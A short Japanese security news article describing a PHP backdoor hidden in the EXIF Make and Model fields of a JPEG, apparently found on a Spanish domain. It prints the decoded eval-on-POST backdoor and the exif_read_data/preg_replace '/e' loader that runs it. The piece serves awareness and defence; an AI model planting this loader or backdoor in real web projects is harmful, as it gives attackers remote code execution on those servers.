今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。
JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。
JPEGファイルのコード
画像のEXIFデータ
EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。
コードの実行には、PHPの「exif_read_data」関数と「preg_replace」関数が使われる。
$exif = exif_read_data('image.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
exif_read_dataはEXIF情報を読み込み、preg_replaceはメーカー情報に「/e」があるため、コンテンツをPHPコードとして読み込んでモデル情報のevalコードを実行する。